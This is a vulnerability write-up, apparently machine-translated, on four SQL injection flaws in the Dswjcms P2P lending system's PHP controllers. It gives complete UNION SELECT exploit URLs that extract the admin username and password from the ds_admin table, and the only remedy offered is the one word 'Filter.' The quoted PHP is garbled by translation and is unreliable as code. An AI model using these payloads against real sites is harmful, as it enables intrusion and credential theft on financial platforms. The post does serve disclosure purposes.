Dswjcms p2p online lending system front-end 4 SQL Injection

Dswjcms p2p online lending system front-end 4 SQL Injection

Injection. Official Website demo

Case reference.



Bytes -------------------------------------------------------------------------------------

#1



/Lib/Action/Win/IndexAction. class. php
 

Public function loanAjax () {$ Borrowing = D ('borrowing '); import ('org. util. page '); // import paging class $ type = $ this-> _ param ('type') = 0? '':" Type = ". ($ this-> _ param ('type')-1); // loan type $ state = $ this-> _ param ('state') = 1? '(State = 1 or state = 10)': "state = ". ($ this-> _ param ('state'); // borrowing Status $ classify = $ this-> _ param ('classify ') = 0? '':" Way = ". ($ this-> _ param ('classify ')-1); // payment method $ scope = $ this-> _ param ('scope') = 0? '':" Candra = ". ($ this-> _ param ('scope ')-1); // loan term if ($ type | $ state | $ classify | $ scope) {$ type = $ type? $ Type. "and": ''; $ state = $ state? $ State. "and": ''; $ scope = $ scope? $ Scope. "and": ''; $ classify = $ classify? $ Classify. "and": ''; $ where = $ type. $ state. $ scope. $ classify;} // $ where. = '(state = 1 or state = 10)'; $ where. = 'min> 1'; $ count = $ Borrowing-> where ($ where)-> count ();.........

If the state type classify scope exists. If the state is not 1, you can directly splice the SQL statement.


Exp:
 

Win/Index/loanAjax.html?type=1&state=0) UNION SELECT 1,2,3,(select concat(username,0x5c,password) from ds_admin limit 1),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34%23&classify=1&scope=1

 

#2

/Lib/Action/Home/LoanAction. class. php
 

Public function loanAjax () {$ Borrowing = D ('borrowing '); import ('org. util. page '); // import paging class $ type = $ this-> _ param ('type') = 0? '':" Type = ". ($ this-> _ param ('type')-1); // loan type $ state = $ this-> _ param ('state') = 0? '(State = 1 or state = 10)': "state = ". ($ this-> _ param ('state'); // borrowing Status $ classify = $ this-> _ param ('classify ') = 0? '':" Way = ". ($ this-> _ param ('classify ')-1); // payment method $ scope = $ this-> _ param ('scope') = 0? '':" Candra = ". ($ this-> _ param ('scope ')-1); // loan term if ($ type | $ state | $ classify | $ scope) {$ type = $ type? $ Type. "and": ''; $ state = $ state? $ State. "and": ''; $ scope = $ scope? $ Scope. "and": ''; $ classify = $ classify? $ Classify. "and": ''; $ where = $ type. $ state. $ scope. $ classify;} // $ where. = '(state = 1 or state = 10)'; $ where. = 'min> 1'; $ count = $ Borrowing-> where ($ where)-> count ()

If the state type classify scope exists. If the state is not 0, you can directly splice the SQL statement.


Exp:
 

Loan/loanAjax.html?type=1&state=1) UNION SELECT 1,2,3,(select concat(username,0x5c,password) from ds_admin limit 1),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34%23&classify=1&scope=1

 

#3

D:/wamp/www/Lib/Action/Home/LoanAction. class. php
 

Public function index () {$ Borrowing = D ('borrowing '); import ('org. util. page '); // import paging class $ where =' (state = 1 or state = 5 or state = 7 or state = 9 )'; if ($ this-> _ get ('search') {$ where. = "and 'title' LIKE '% ". $ this-> _ get ('search '). "% '";} $ count = $ Borrowing-> where ($ where)-> count (); // query the total number of records meeting the requirements $ Page = new Page ($ count, 10 ); // The total number of incoming records and the number of records displayed on each Page of the instantiated paging class $ show = $ Page-> show (); // display output by PAGE $ borrow = $ this-> borrow_unicoms ($ where, $ Page-> firstRow. ','. $ Page-> listRows, ''stick' DESC, 'time' DESC '); $ this-> assign ('borrow', $ borrow ); $ this-> assign ('page', $ show); // value-assigned paging output // Title, keyword, description $ Site = D ("Site "); $ site = $ Site-> field ('keyword, remark, title, link')-> where ('link = "'. $ _ SERVER ['request _ URI ']. '"')-> find (); $ this-> assign ('si', $ site); $ active ['loan'] = 'active '; $ this-> assign ('active', $ active); $ endjs = '// AJAX pagination $ this-> _ get ('search') receives the search parameter, however, tp The sample receiving parameter is only encoded in double quotation marks. It is enclosed in single quotation marks. Injection generation,

Loan.html?search=%27%29+UNION+SELECT+1%2C2%2C3%2C%28select+concat%28username%2C0x5c%2Cpassword%29+from+ds_admin+limit+1%29%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%2C30%2C31%2C32%2C33%2C34%23

 

#4

Www/Lib/Action/Home/IndexAction. class. php
 

Public function index () {$ this-> copyright (); $ where = 'State = 1 or state = 5 or state = 7 or state = 9 '; $ borrow = $ this-> borrow_unicoms ($ where, '', ''stick' DESC, 'time' DESC '); $ this-> assign ('borrow ', $ borrow); // cumulative investment amount $ borrowing = M ('borrowing '); $ accumulate ['sum'] = $ borrowing-> where ('state'> 1')-> sum ('money '); // cumulative expected earnings $ money = M ('money '); $ accumulate ['benefit'] = $ money-> sum (''stay _ interest '+ 'make _ reward ''); $ this-> assign ('accessulate', $ accumulate); // News Center $ new = $ this-> someArticle (16,5); $ this-> assign ('new ', $ new); $ shuffling = M ('shuffling '); $ shufflings = $ shuffling-> field ('title, img, url ') -> order (''order'asc ')-> select (); $ this-> assign ('shuff', $ shufflings); $ head ="

";
$ This-> assign ('head', $ head );
// Title, keyword, and description
$ Site = D ("Site ");
$ Site = $ Site-> field ('keyword, remark, title, link')-> where ('link = "'. $ _ SERVER ['request _ URI ']. '"')-> find ();

$ _ SERVER ['request _ URI '] is obtained directly, and then it is injected directly --

 

Solution:

Filter.